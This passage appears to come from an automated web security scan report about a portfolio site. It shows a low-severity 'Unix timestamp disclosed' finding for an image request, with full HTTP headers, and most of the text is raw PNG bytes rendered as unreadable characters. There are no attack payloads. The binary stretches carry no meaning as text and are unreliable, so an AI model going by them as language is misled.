          ´qr¨ô' H?ú€àöª>å'	 ¶8ÿÈ ­0`øÎs"Nnêz¿EÚO0]Ì7qzíèØq%ç…ç™C¡Ô߈ã/JÖ×ÅÝÅ,¢âc”{QCÊmr0"y{¯¢Ì os€E™«!¹	I™Þ×Ð9 |zŽtÇ @µZvØ
          Í@Ôå'û
          ”ƒƒ9PÆÉ`)ýw±Œ¡°r"xüà¦ÏÒ8Ãåp4Ɔ)sÒâàKpE7ÕºµfšŽbÔÑk-¯Á×t„ž¯ ít^+ӈdwk”÷"Êàʌ³KÚVU\	·¼O©;p<”bu»ã­h™³Ý¸æS¡Ðrc”©ŽËÒé=âä:¡uQ)øþjCo¿1œOFšá÷ȵøýðù$^'ÎÝ>:²*0Fýu<mð.ê8’Š5¯•¿ÇYˆ¦e…e«áþ‚ó}‰±ðŒxÕH
          C¹@°"‚œ„g¿Vƒ1¿³?£ßõGž/iH€.¸KyyA^®êXÐq¥Ò"]ê§<0¨³}eørߏ¼êh| ÿà<sÐ7ù"ÿBKéAæ
          ¨\Z\¥¾Õ–x—”¯Þ0ìó<?ÎÁ—û÷`bÝ¡!çßh”yŽŠò§€ÃžaÅÉg0Në'øòŠ.äMZ_+|ÞfÞÉ,/>´vt,X	ç`èêÁôž€ïU^ø%¨¯}DƊõ¤'"½îÀ“®÷D¤½…óŒÏ?[½¬“Ñn«ÐxçãV´4&`q)87»†íà<å¸Y,æG©ßǺs^ >\Ò}ê9×2ÏËõ4žÅÉA£¹
          ýóÌ
          ô‰J<ó“ 5V8$‚9¸[­>ü”[yÖÖ÷PŒó8åjX“RG¡œèã¡ÿ
          @¾¨GâØoЯޡ^Gþcþ\pumlðÌÕO@ÿªbDä<µÁü–gõ?Ú
          ÐW߉9èp\–?Ðp‹28ß­SŸƒ^¼.ʺ\ÄÕ'䕞hÓm¢qµw
          ®u4ÄyD×"¨Þqí—o_ÂmÔ÷‘ÖõÞ+H–4ƒ†ürâJí¢¿¤5$3i÷Ċr­1z’2Hݽ̓ü™ŒrqÞs*ŠM—¼=Íþːq>.¿›‚ÿ÷!YºÝœ1¡@Ú8È74üÒð‘éßD3gÔ !
          þ¿ÐåÆñ4OF]£Hé‚¢`’?É=mtðd:òÎ(¿K|h­(**Úuyĕ©T?Ôçø|¿@ Xr aü³xÆPœ!ôšÏxeŒé@/3†¬Á$}qðåŸäKÔuo¾+*
          Ҙl\2'$
          m]cpwÖ3hJc©öPg.gÄäߏ-+,L”Ò¦ñR³‘F¯i¶Í!Õ9é; Ný!àº&ã\O‚Ç8¾Ôwmûð:ÈŘq‰"—òeÜþí½ökQAŽËåµ´ö*)q1÷òÂÅbvá0Ô(—÷à“Zàéâ<¼•:“²^8—
          Þùwî³@°<£>ƒq¸eÀŽÉè37Ö7ñtˇ=ý?ôU†áú}ú¾LÊt WP_DyìïûÚã궙†¥¹
          ¿èâ×á	•¯¾¹1—éq¦é]æé—œnÆvÆÛ=N®87Ws€«Ìc¨ÿh|>‡ºm'/¤ÁØ<NC¶‡jÛ¶êr	~'_ž¾eeW¼Õ‡þ~¯þv¨¯}€wsÆêqÞEP_.i?â\ä5LJÕÆØÄù_Äñߣ]ÞÁñ'”µmK£—sÔ@ûÂ\v~U‰*iW[¬kBkÍ ¡\Žýr|?ã9âd Q#Ûkñ\]Xp5û(ʼ‡üVêÎÉ+ôôk\Íg«ö½|OÌY³ÞÁÄ¢ŒãŒÝ!Yƒq>oT¸¬}m¶Êy۝O뗜N—ã PpŽ]q:/Ô"È¡>Þ¬Å`|Bœ\ÆS¦±XxS ¬ pc, §hÓ;(¯ ¾£Úãw±*s"H‰ñ’èyð¾I«Ó«/‘ÎIÑ-ÿðÔ3,/Ԇ=1~Ð c¤Õx‹ZE\l&õFFû/ƒ(_A½n)ñ¼\=‹L	ÎʙàHZ™+4¿¶Í9’löM«ÛœÆW.Âl3ÔõS”3e<«íø{uƒ1ÒÞÇ@^¯‡ÊcŒÑ섟g䛂%‡Åe0Æ1iu;&£Pyî|z„©5#ÎÛÍ@9ÿ-6¾ä†ºH—‚Ë®çpÉáHNÂ`ìÀ卨۵¨½WžÂ¹
          C·A•2)s
          þÒÇsâ“ÇsÍìÞ2v»ò¹ÌŽ/À†â·ü׋»öhñ&&	/ã܌ww-'n,ð¼і¬ÓL”ÕçÙ¯>…œŠ6êy0ï#Êý˜^Ý4FрƒcwÇïo✣}Ï»*S¬7 wLJ
          ÿä›(×f0f?j("ogô¹d¢Þ3Hé]Ðï²1rÙ£<êzœÿUä‹:ÌD^rám¨ÃÎmÛ¶­a@¨obÏEøí@”ÜÀ˜„/0øÖrŠRÁÞF™GQ§Q‹j0fu:0¬ÚçúûZŸÍ±&>¬^Äü}=„aÓúÕÊßÓ`ÌMœ¨ǞïB*QÆK8×Þu½˜«]¬7ÃùŸÂñßš!áÔi|yÊ4z¥ç>¸\ú¾  O»ƒó€íí+n:­¹\í­{¡N
          ¾ŸÁ²DþX‹ÇC]l
          §c)Ý2ÜóÊÿ}¹ÊÝ£º8A£5ףϑ§p†ÎaÜüž<_mטÔQß%n0F~ŽwláM@°b †Á˜$2¢RËt¦pò}a0qéo HÞ ¢N ºÇbò’ï'74Fpé	w"åd>þ¹€ÁîQæq¨ÇÇ I~¯Ðx»s)qœ¥Nðš¸k,ã±þPÐùf²	˅òÎø¡ô,›‚AñÙИÝéýY7Lqñú ôq­“P¿q(熳 ÁÙÅ©+ŽÚÒ`ƒ1
          L>7mªÇ #–ƒÁ¸‰ÛÈÎó®EßD«ï¦w+ãÑ–®ypÓÑEç˄·£ÆîEX•	ÁÂŒéQLã)—‘£~ôü{õ;ãøR½z.nq7žÙk,·Ó|Y¦Ô³¨ÇDæ×i}X˺7ËE“Ø3¸Œ/)“k#ðOƒ&Ձzû8öL¸¢æ)pý(÷ÌÀ3·Ê0dÅh-ãìÁ?
          ù&ʋÃ`\Å OÔi$Ž“kœVŠ:œãsc ®NàrNtLvóÉú&öþZþš¨k§„_ñ«ÓºµŒã$ׇ¢vE-Á-‡ ÜÞ8v¬Ó
          s&äœTÒæqÖ×m„Ô¶-1NriŒA¯Í‹ôJ‹«hóQŸÛ!Cqí¯ÕÆßõµO‚*÷'­g¨!z€ã~—ãÿûPGÛiÜ>ŸÎñau‚/ÜPî!(sÚÚåi¶õm¦S·_Xøº†uÇ`¹@CûcДûšñäÍèãQæKàûé]Œ¾<ÊéfJ]]o³ê}jy5SWf8甐c‚ÖçÖåÀV
          Mü”Úõø°¶ú&¨ï>Õa0v:0Wâø‡‘&¼)VÔa0®>p0–ÛÙ jîÜÿȆqÓb,¶8KÈ»JÖ{¢¬¾ ½ÉAAZ]€ß7ÏYҜ³sù3Ò7Â9.E]FOFï8SlÖ/o[îýngT‰„2Üðn:üßݤLûvEíZÆÙª€×ÈØq ֋Q—7ü4c…šûq,7_qÀDă~2~{å2vÐ –KcE¾‰
          •é8>ã¿è{ÞDƒAu¿–ägc[4gûâ¼b0–3äŒ!ƒÀט¢¢:ûaaaÙj.û0;M9·á7»»}9»Ùá&拃/Óæ
          òËC¶&\‘ó58†q]ü‚<å8ÏC¸†ñT8SîÝÊÆ­UFÛàú÷ÄqŒÛ÷>‡eΈëY%þ}´ùÚ(sg(¸×¡Þôa»Ý…ÉÂ&q–؃cá
          Æ@3JC©#p<CZpçÁŒçyÁ–ù&Á?ù&ʋÓ`Œþ<
          º×ãAJíÊ00|ÙŗgäÄdBœ€:¸ãVԇ{CL„\¦Ã wåWX“y0à Up~nêö<¸â[Ôau+†¦¨k98®5Í=/P.
          ž²+q®§è%gYHƒ±~Â/ö¶§AÄùÁº¨7c+DZ“ñùbà™cÈÍùxŸp+ÖUëkPîÇ(w*ÊxÇéªy<j ªj0v+ä:ÑY„çÃõ–ãxÜgn\Èð@êv´ßö¼wñXSaئ0Z’­®ƒNL熺ë‹1n¯\£FØ¢Ån|Çà‚lÄón4æÐxþýU£xî
          EiiéêèÑ—ÑÔôÙЯ$_"¹	9úÎó)Ò+Ö<}h»Ví²{à,¯cþF}yŸÀyÁ™æ^ãþRoŒ³Õç÷(óА/üièãúÅl0>1Y•æB̓§…7ÁŠ.ô‹ýÎ égA¢œ8ƒüt·|$J¢awټqé4óޕ1fG޹ÁIœ•ÒjÈہ“päå&BTøßI]o”:
          
          ê~ìQ ñþ
          ˆì”9Ú׆
          ð¥µMDüµÖZ“KåÜdB©¡ Nî¦?˜Ëq޳¹A\R>Ê8åމ<Cð‰F
          Áz~ß²º!X­¹fs.•D¢M¤Pg–‹¼w㷓0y؟;Ö⼇Ú»ƒÈëqž¯ñýYÈAñ ì6% ؎®}ÓªÚxòÌ(ß8¹V¸Ðóî¹G@âüçôkl:%–Àa%à"nzô.ú!7MêϾ˜ðKu¡"eìðǛèëџñß‡ãØ»Ðw%‡ÆEWÁbâˍãâÜfO©7ºÐÜ™=Mı§%cæ_1Noƒø…Æ]ÆUç1~šqHÕ$†ªhhè\Ûú¾ö.FÛ¼‹:}ãٞ	¯v¯oò7~{×=ßi(ú|}9òVák7ið<zþníï+ÿ@*Åqr½‚TˆsœïÚн(õ^ä8'ÿH¨h5TôÆ^äæ¿çæn¦óṡ罃>É»ºJ‡8¹V ¬½1¹þ:S÷çübÕ%ÚO. ÷.wéåMzÓÉଇ¡16;_Äߝ/æb¾úæ{¡nX%6Ðv‡¼†sN†Œ‡Po;-á×DpÞ³Qޛ87¸ÓãïyàáßPÑÙM›È9àžƒÀ…4*ƒÏW(N&OíÅë¦î‡´2žÙ:wœé‡4–hû…|ù>HÓ£o¡ñ¸J´>ÜDt˜ç‡Úpù9õp:7œ
          ~¬Ò¢¡í“ÜŸ¤ž¸¦.¹õä>¶ø÷
          ÷ƒãŽgÞàX„û–ŸÐF'¡½By£Q7ò÷Ó.ÑZoFCW\œÚ®9êÍ¡¾Bý*xÍt©Ëð…©ÚÞÏÞ,БãÒKèg³ÑG¨C=‰þÒ-·Ÿç
          ¹B§#ô—
          Á=;â˜kqüH×g”zr`u½ù¸—Ð菽‘ï§ÐS߆nsd!qštm†>ÉUUôÃêóþ|ý­N~+®Ê;ÈM¸Öaä Ôµ/α}œœETNÃõ9®ÚC¹§¢Ì¾Ïœ•ÆPèQ}£öc9hƒ3™†:ŒÍhó{‰	¸‘ÿO¨ïܛçÖ7A}¼Iƒq*eÚã|7#O­í'¼)Vpi^ìA@RïÅågÆ3»Öáá€Á¨=à@|TôŸÏP	÷ýõ6Om^c×i¾IóSþzô¸û<caöÂ}$ŠW©ÌGP|S’+7ràX˜M8¨€TùƑF”WQÖ,3[>υëâ¹Q‡Cù6ßÛ½\”¬ÌÁþ?roÚ|èÊueÆØ|å>ŠúvËoFƒJ|xdÛ7­Ïe[Ançr¿8¹VÄíñÈ&/WcàÙçà²o@°”P~qʬR×CÁëžä8f¿Tð‡äpÃ0\¯«ïgÈ)q‘ubqñ¥‹?Iï=eއ=^ 4f®ñ’9z~àØã–_Àý›†à2íyg1FüsƒAŕ|íêÎX¥	¯fÛO½‹v~mwM]|ME:ª»êÍ€ô©®¬×wQû½ŠºÜ‡ÏÿÒã1Nþ‘`ÃäõBpFOè·p2›Ë/™L¦ØMÄÁÔeЇN¨oÅ‘ôWèT/øiÿ\rHje¾·Ҝþ–èXäQLj_…\‹‰n¥Êh<Ȇ¢H¯¾õõcSh€Á9.Âyɯïeù5ËC\έû£ÜY>ò]ŽÏ{ùÇg7§#ç0ì~ç˧qÜÅ%9éÙë†îž9áÐò…ÃH1Žz*Õ|}®ùn´_¾_µN¨N=ÁyGqÚîZW§Zø»¡íÓÐzRÿ§‡aôbSõŽÆ¢ªúvCø›ˆç{pÎÁú¡-†>¯ëÚ;„ƝêíMì8Y hÔ@?+E?<}§/úÞÃ3\û^1‚èíz6úæÝê|‰spö[:ÄÅ×¹
          ç¸ò2õWíé³ÚÅ+ÉÂ6a!¸õHô£¬~X}ޟ¯¿-¿qìÀïûàšiXí‰qã¢\þL”³°ú\ÂG8æ2Û§ÆüŸß©cjýd¨=:~°-z²=MŠ¡È‚ò|<Wo’£Pçúu]váM@  ‘ƒsÆ[æäÂ%›\VHmʹ@ @ @ VL4	•Ú(H«Ë}¥_ö•zÿŸä5|Ӂ@ @ @ ¬ hêyþöÃyú¡@ëÃèmŒß]˜@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ ԅ‚‚ÿô³.ñ6¦IEND®B`‚
          Evidence
          54444442
          Solution

          Manually confirm that the timestamp data is not sensitive, and that the data cannot be aggregated to disclose exploitable patterns.

        51. GET https://beekmans.dev/img/portfolio/red/Cyber-Kill-Chain.png
          Alert tags
          Alert description

          A timestamp was disclosed by the application/web server - Unix

          Other info

          54444444, which evaluates to: 1971-09-23 04:27:24

          Request
          Request line and header section (291 bytes)
          GET https://beekmans.dev/img/portfolio/red/Cyber-Kill-Chain.png HTTP/1.1
          Host: beekmans.dev
          User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
          Accept: image/webp,*/*
          Accept-Language: en-US,en;q=0.5
          Referer: https://beekmans.dev/
          Connection: keep-alive
          
          
          Request body (0 bytes)
          Response
          Status line and header section (1149 bytes)
          HTTP/1.1 200 OK
          Date: Mon, 06 Dec 2021 09:56:19 GMT
          Content-Type: image/png
          Content-Length: 418630
          Connection: keep-alive
          last-modified: Tue, 28 Sep 2021 10:12:46 GMT
          etag: "66346-5cd0b748663a0"
          content-security-policy: default-src 'self' http: https: data: blob: 'unsafe-inline'
          x-frame-options: SAMEORIGIN
          x-xss-protection: 1; mode=block
          x-content-type-options: nosniff
          referrer-policy: no-referrer-when-downgrade
          strict-transport-security: max-age=31536000; includeSubDomains; preload
          Cache-Control: max-age=14400
          CF-Cache-Status: MISS
          Accept-Ranges: bytes
          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=E2orYqFsWT64G3opaMnBKM9ppGt0CqNGFKj9GhS8qqUhBFuW5Y4yC0jEF5yYFczxZgwBfbG4KbdNA7AnZh87yNoU6hUqp%2FUhMIppocRYnBEN%2FtLcZr5yxLHxrbEEXl0%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 6b94a4c76cb1417e-AMS
          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
          
          
          Response body (418630 bytes)
          ‰PNG
          
          
          IHDRŒ^`ùqçsRGB®ÎégAMA±üa	pHYs‡‡åñeÿ¥IDATx^ì]|Å÷Ç¿åg¥…ôäJ
          ½—$ ˆ`Ã.6zMìQ±‚AEQª]@Péi" ½·´K/@òþß7;»Ù»l’¹ÀEïûù¼ÏííÎμyûæÍ›^Ã<ðÀœGQQÑ
          bìÞKg>ù”Î|ð	Ñ®Ýâž-–Á.9ÀËË :s–ò¿žAyïL ó‹WùܺN½¤õAǙ¯s¿, ¼·ß£ü³Á¤à34PõÀ`Agö|€l>fJ
          £ÔÀPJõ·*Ä×|Ï8C¾vс¿çÌä)d«í_Ìg@ˆÂ'ÿ*÷Ò´|"|wùêEÒAù”j®_
          ŸŠLmuü©`î|æs|Ճ8';n¨TT%.YN	™Y”˜dO¸—´øJõasF<ÇŸ.£©r@'ëÑéÁ#+Aò¨1”‘I	IÉö|¦¦Q"jT“T Ð&Ìç9ÍE T_Šؚµ¥„_v|&§P‚-•’=!òcó
          ä×—Éh<pZ†ª˜‰›·ÚºJ\¿QQX(ÉI]•i<œ=l„H3eèE	ø*AiiJÁƒdÈèªÂ
          ³Åõ6)͈/G‚BÛzÜ%òw拯™U‹ŒÎƒòåøÇV/HXŽ„ôŒ’Â…¥ûjēô5(ÑÑê1á#	%!®õ2Z—qe~\|ä„}JòáÙ"oïWµ2sü¢°
          Œ7ä£<JZµV¼væ7,ÓÿÉh=(
          R»ôVí…å(Qå^lݚú]w-ÅÔ¼APÿ®§©qq%Âñ»©~ÊèØo–Ñ»ç÷îW”øà!²!½1c^£÷Þ}ôžS4áϯ¶¦mD¡Ÿ	2j—ñ°å·Ýû°&ŸVM›ÓÜúM쨍_@±ü(qù
          ¥Ðåä^²vHµ=«(ª4Mˆ°º‰¨²{_u%e…Ó*ß M‘ÿö7“
          áûùiaõï	Áge»\ðPŽ£¬|ÉϾ$j…í\hИˀOé,1oÑ}ú
          ^¹öÈz¨Îke.øLo!üwM. ‡nê,ÒoH‘ \ßdƈl{ ÐY¸Ðý(“ðÀN´­n Ù`EUÁ%¥ØhÀµ×Ð@Ð(îO>þô^]/M‘¿©çOÓ½ý(×®¹ZM× ´µ½‘Rë°ào’ɸ¹¯¼&B¢ö†ÐîÝ{XÆšZÞÔ¿ç]
          ¯xW:@&áp|Â0œ<­É„IUäŽÁf
          0[ĵ3Šœã€Úòܟ›=V¹4hB×)"+‰ª´N\ä´ôbÁge¹\AP(&ÚP8’>ž¬ñ¸;ÀJ;wîéäœ<EÓ¼|iۛo‰ÿ*riº_íüx¢øo§È T´ÎNîRɄ;!wª<$EµjM;;w§½ }7u×]­(˜áŒ(åîÁ«h¸Ô8ük;
          VU´à $Ñ×_'”´ÍëK*®$í™­¸>ŽT¯@Êÿá'—)+¡(pÙÙ"~M‘wí¢é>4­žÍô¦PÚìã'„ÒN÷
          DÍáO3äý3))%9åÁLj¹P2©Jñ<Ç}ÁI_Mñ<t˜>B‡@±1±Oñ±qâkþ=|ä¨S: 
          çñɤ<Ð#­i[ø`ݵ+J"\(*/”N»ü-‚ø:
          ÷øYo(q4Èî}­}²„²à]ÒÚæÑDáVÈøõùëÚõhëoQö‰´ [*@Àøº®ý†`&†ó»t£Â‚‚Šœp츈|ΑIU
          ˆç°(p¬|ˆ?ª]…èÒé¦2‰Ãt5YKß¿­{¥í>)=Ýã^8Boo«åKIM*þ°’ú¡‘7ÖVUX#âgl•^wm‰÷Sâ'›Ò×X&W)ä¾úº]ãI¯ÈÇ-¢YÁVšdÖWžé3ÄýY|֙QB‘áq^À§K,§Áñ©®ZZzúÊFqäWϛò¤\} ¼)øeùšLhÜÊڎݠs›·xÙøvwñÐnÒ·?”lŸËÿOs!¸Á7²V-:„Ç>X䏿{ÚsXoÇ÷“_zU(ÐF&W)d~Bô2¨ñëy͐a43ÀD+câ…ÒªXòðcÂ¥XÖ§?Í4‹{%™»¡0™T¥ÀñE–ƒQä³RyUâšÐN‘Ñ(?·fG‘EãTò¨±%›lKÕµ<J1@IyðQ²yñwuɨTއŸØùò%{')n‚#rànèï—PdȁÂ@6™T¥€xò…"K_¾"Š|\‰;uÔ¢Wd4 ábɤ<Ѓ/Ä@ˆƒ`™^mßÞPqõôÎ]:¥ÐQjƒæ”qëÝ.:œS|d4Ø8~Vdöסº=€Âè,Ùàß÷¿÷>ÏÄ_©Cë¯Ê¤*”•-©h$þ³[Ä!®ÅuF®ErŠRsyÙ痯Ôúf…ûxpñ ˆ 4êéîõ7p+DÃÖ³p÷^—	-¦°t'Njé,üíwz¬ËÍ¢Þ·Þ®Y8&[»Žb†â¯+“ª È-ÙJé-⯈"ç#<H¢R&HUäÄö(=™”zল‚ð1Gáöþ¿Ëì”öôÞ½tr÷n­kN(òÿ®*ñ^âN¥‡qgËd*
          ÄÕVLy„â9¦§wšíèÞ»î6+ˆø,ÜwÀ¥VîìÓ4ãPEf7ˆX‘SÚRª©ËÔK&ã(áW¥Gv-bGáö»ê
          Ma¹#?7WP¿+‹ïõXp\{°õ¸J&ãA)„UÎRüOGbEæî*== s#)%~˜êVü*“p	ßÉTÿш®ˆ"geç—I#äDŽ˜œ›§¸·¢,@ðE,¨¤©J'¾ ’{#T…n1Ó³ÑË­[ÑP?_í~4™çd¨ï%¿6N­].t°9ÒÆVÙaçŸÝ{hŊ•´jÕêÖìöî=ijåËWؽ£0œÿëï*Q^M#
          ÒÉÊɵOۀ²¡¬¥Ýç=žOü»dÐæ_‚«„à҄È
          :ÿÃ5¥U}äØZ5Åÿe3f
          Ë¡…ßñˆãܶíUf9¸€pA±Ýõ`qºà!	¼–Gjø®ª}͔ޔ•ã6µKx'0Ÿ¢¦Ó§]AJåÉGUdþ•€àC³ã•y¾‰+WÛUy¬ŠžRus3˜’~œ#ÞÍ}ý-Vm•€ò”ªÖÖñf;œ"¶ÄPb[Ö*m8A©<!‹-ªÓ“êu”ÞLä³Ú(±_ûÁÄäÕ¡Ã
          òÖE‡odÌ7·ôÎ|‰†
          +IÓ¶”®›Tñ€,¿söç¹´rÓÞv2Ê*ÃõM[AçÏÿ–çt$œ²ŸefH°Ú)ƒ‡>ÓÐpÚ¾çh•+‡¹sÿ«³òΒ
          ®§›üÎxÁ‡!zÚ¾CYÂ%W²\פ÷¥ûÂ/jùFÆjä×6®ÊÁZúQqBx¼fŒ…Ÿji@ɓ?‡%ƒEáI÷L°.ÉOÂóp†Uu[@qUª õZÇù3Ÿ^mRÒLïÐUá<¤Ä.æ‘çV£ &®\£¬a¥ƒ’<6òC™×AUÊ«oT¼H絏¤|î¯fWÃÏJ¶.=(aË61<.ød~)å¡>¢`r~²Äӑ“)äÝ.FÄQ#ì	÷^!â“ÄŒêÉ»mô3òñE×úô}"¢GCGzñz³t0áV&ñA,Ú
          êÞ#?:§ßPFírø¢ éÓêüèèXæ!ï­÷µ…¨Ÿ’Wîsªú?j·Š¶{ß'"ö˜ŒÚ¥Ÿùútnh9€Ó?p~óV|(«ŸÞÁtvæ·B¦~Q±ßéßç|˨ݾVYPDìòq•é/}º¬Ôò‘|€> cB®÷€Të£â$¹° çõi€ì&ú€§(Ð2É&óyôÈWpˆƒ|ÛG7•\ŽŽiÈG`Íž>U¸T€ÿóñÓR`ƒ`O\ª|ä¾ð‹ŒÍ±gZ0^¥+’áÃÕvLS>ª0êFô®é—_ˁÞòq¥á×.æ]ûøË¶PmÚÔ¸R^–€o‡è®öq]x¾àweäÀù´‹/"º«|ä¾ð‰ŒÛfÇ´Bçåc—ÃъzEÅÜ%]|#b¦èãc’*
          Çx¹!%]Çi»8
          j¢_{‡Ú5*v‘|tAð‹ØØ.>|äހ2|èÈ8G>v|"cÒíÒq‘_‹¸
          ôñº‚wGåð‰Œ*U
          %⍈ž&]àîÕÇçªÆ$\•vñº¨ÐU9üÚÆÝ®g\[ØÞcntŒ_>r	Júv1så£
          ñ1ììGlæL¸Ëôq3ÕjÑ¿¶|V!Flá—|T&BM&§ækûµb·O»˜eò‘{#0"6HϸBeû…h0<
          :¢4Ё{ñ£Í{pô»¼ÚF7\‚ƍG_¥Ÿ©.ò#sc§xúS0§îÂϽ2X
          ïv±·:Æ#•‹ú!¡N…EœïÙ§a/cð4”«p¨!÷&Ê Ž2õiãÔsÎ*2C?“¹óP?ùˆùR+ê€{keKˆÎ£¯pdžéºöƒ}d0›pfÂǔU7>ñò+8x9ô\íÚ4×˗2ë7{MLŸ³Ê®«à”ŒÆ¥€‹ôº>T,Ô/)-ÒÀ‹èÒÓºžŠ»¡xáfބ‰öxí–ýu|ÆR@ûèV2úrá¬"3w¡>ŽŠ›qóídãyŸÅ]f¼`Uí~´Ü4Ôî}P¦Œº\tîÜù
          yY.ü#£ŸÔ§Sòa6s^yMÈ­˜OùËäg¡´&mŸéë2ªKÇF“Oہ·€±7ó&FëùQ¿®§¾W\N«ø‘N;NÙ<Š»ïïôå°ab–ïC‘&/Pe#žªí›DüY‚×v1"MÑÊJÐ*’ÿÚ¡¬¢àAÈÌA“Ÿ|VQ˜€±UÔè~PòwHF[%à~ZïvÑt®°ˆÒ·R”Êš¸è7…Ïô…Oþ¯bHÏ9ʤ¤e‹ÂZÕý½>Qq¢wëû…ëI¬c”²JzíMe„“‡Âa,„\y6ݦ-”jn Èü2dT—Žƒ	)bçœ~5¯§'L°So½¥;8yJûÏK—þ³›\ó?zµN]ÊûäSZ½ýp¤Œ¾Êpÿã(÷·AvºEš§'®ÿe>­;ώgxÐôÙ❴Ð&tädrÕß¿g=þÈlÁÄÚ@g†’™Ub”õ‰Ì§ÓöB‘“wVðÈòIüm©?<ê³¸xúnÌ»û<õÕÆsšñNÁÂߨ:Wé|˜2ÁÃǬÄŽ&PV=“Xå¼}íZ{†%9*2ω
          ðñ“´ŸoÖL¸ycÞàÙ
          ¸ø®¦ìÇG*߸IðñTÃwGQ7²A}»i vÄëé|ÍBIÀçŸ2Ú*+¡(lw–œ¿ÌÊáïíCA!϶›IÇ„ç¶Æ­Åû¥S	n+/ä.jÞlÒ~.Ìó­ZÒØk•=ú¸ör啔Ì5ˆ.LÒÏóŸg¿ýezŒöâcÀó“Of êãUÌ'Ž°cR0
          !ÿ
          w¢]«Öôҋ/QFf–ØàC?Ù|͚µôz×®4´fM*<Zu“gÎmÚ,„Æ»fÚ ”]ue‡Ó3:Eæ=2f{ûÑÒiÓJäEoëk¡ôVQ,øæ2êrQñžÞW¼á OˆW¯Sq­—ËT{¦ÛaÉ_”-:âK“Q—‹Š4öïSÂÿEáV÷é;yü„¨ÝzíÌ
          §…>šlyöR¿ Ú¼ø7Úº´Ør'.].¾Kx—Q_|œß€âÀ䇟‚ŒÝEÖ`­\¹ŠºÞԙþÞ±“&~<QÜÓ¦={öŠÌnõÖ.KFï2 Î<öÝv=ù4õ½ò
          xýubÃÞ‘ýyUØÉA¡ôa]oqÍ>þc0Žú|	‚o*:ÑiÁ;«Èà³³ð!aåÔô>™ø‰Q}+|O†)ŸO±“Ý/p‰ØJûù‹ÿ«V¯ÑÞåI?X¦NÕtmBBjÉËr‘ÿûRÅ0°,Ó³¡©²d*çŠ3±UV¯y/?õñ^ÏûDƒ|î–Ñ_< Ñ)uýÅR#=S~^õ„@ÅÖJò^·Î]hÏÞ}BÁõAO9y"“¹/¼âò’™ùPo!(æE¦±{¤ÿßÿêÿiyГíÖ»Uc¤L¢L )ò²L¨.…h!¶°Žr2"^}¢ÿogÁ_E]Œò€|¯f¿8ùÍw´t˜xóH–›^iõ¤Þ7’+×g¿žaȧwdÌý>‘±ñEE–*N<܁»þјaË`	Âd¥U響ܿO_;3™ž÷ƒàpÏÂ_þÛO¬"þY&Si ®Í¬Ä‰¿/ð…jDªBó:A5v„¼	Éqí>Ái­ÛÛmüÂÄí	½¼¸m±qÃJ‡Oºfõjá+ëŸÁ2ëßgëžõp_—ò‰è¡=º´xO–Û1<ãڎe´µì¾+åʭ͸–×\êßï¾8JµÊ¯ÈdìàwRßÁàÛ>Þ%{ÔÈìÞSÙg
          Ê«2óü³ÏџðEõ!UOãú
          è­7ljŋªÀي´jނ2t=,®êù4$™L¥ÁŽ}9¶rª _©]W™}âCò·Þþ´Åß,ü8^úο®ïåÿ§ñæHìªd=Úße|â®e«”¸áO»txqUf}ø!gG ÷ǟåÑ#½zi2åðú÷y2^|Šø‡Ë¤J…5(È©ùçií:Šu{út˜’‘6Ëm…/
          dË2V‰eš{}áÒÊU5€L¦\®ÌʝYµü¨¿CÉb·BÿŸý»6-ZÒͰÈÓ§M×>È«£^=ÜPyʯ½ƒB1Š|vÚL—)Hγ/
          7€ãWÍ3z!;R¬	‡{2´x£BGâýäR}Ä~råŒ ϛäe©àÈió6¸?×n\«=FÈ̲eð6‚OµßøÎûÅ}Ÿº^"·Iø=~_ðŠÂËá2©RáLcù}Il©;ÿW;yBšìÿ²ì˜¸€eÍÊ«Þcš­ì³áHœ§së7–É'”Ùn®G¥”™ùyU]?ú|Ð 	V̶-[	>öð#âW]zÎî[‹[»ÝBaTóxÆÄîBRã`âÆXî-wºL‘Ó;ÝB©Ö†"n^¢¯2øËz>¢<û4„Î}áªÛñÖwØñ¦§ÄµëDõÊV&U*œiìñÙv¢º–ÝiŽ.Å>4ˆ‹x} Â0ÎlÜ$~YI‹
          é«©_مזýCÎÎ*r˜ÉTî&ÈïŸ\•vf
          ÷©26¢!Æ;I1¥Âbg†®oÖ§XQ¡UfdfÍ/?š7ayÕ¬%„Ƥï‘`å¿:wBý8ìb¨ÄÿÙ¯czö™g©Ïÿ]F9
          [¸L‘ÓZD’­[±B~=ò)CÇ×­CóÞ{¿˜Þ}ŸR`Á“¸ÀPÊñª")“*N)òƒŠ"3Ÿˆ_ï†11²Æ¼!–råL.”óܾýd«éK[ÿ¢‚ü»ð– ék#.V<Ê;ã™"¿»9m^¥ÊTOåíÓg´É¤J©ZRփÑ5Mz+lYt!ʌÌÌ][ן¾|üqͺ²EnÚ¨1GC ÷#Šê-Pz°RþÙçâ˜-1?ãÎ}}f‹ÜÓeŠ,ö“mb—†~wO•NœH‘m#èûçÐwe?ïÖ¥+m_¾BUä—eR¥Âd2Yåe© XU½Eö°SÌ(YZׂM[į°ÈçÎяßože.òˊì¤EvÈï&a‘÷´“©JvnbfRmüñížÑnP*¥šÂ)g,ró¾ÆÊZµŠŸˆÌܝ]ۏ:”.#¹cûtç­·‰¾bþ8úÆûÈïÃú©ÿ¹@pòìôÙ.Säì'Ÿ¡T_ÝÑHcÀÕÿ+¶¤“'Ó²å«èÁû Ùß~Oß~ÿS	úJÌ]s¸uo½C6ÅGn-“ªT¥T÷2æ®·ìœ\1ÄŠÉ.˜Ó ¹°°bøáÓn½KÜ÷Çs·pá"ñžÖk„xœUdk``¹ƒ<È﫼³iÒ¯‹5™ÎŸ÷uÂwfâïÝ]¥[ºw§[nénwO
          {Ӎö[Ž¥"Þsë6ÒÕMû·‰7‘w‡¸P—(±ŠLø±Ž½Ï>õ4ý#w~Té4ª &
          ¢Åý‘6òĽí#"©IÃFv½Üٗ{-PMÊd*
          aéXAdâ¢W`î
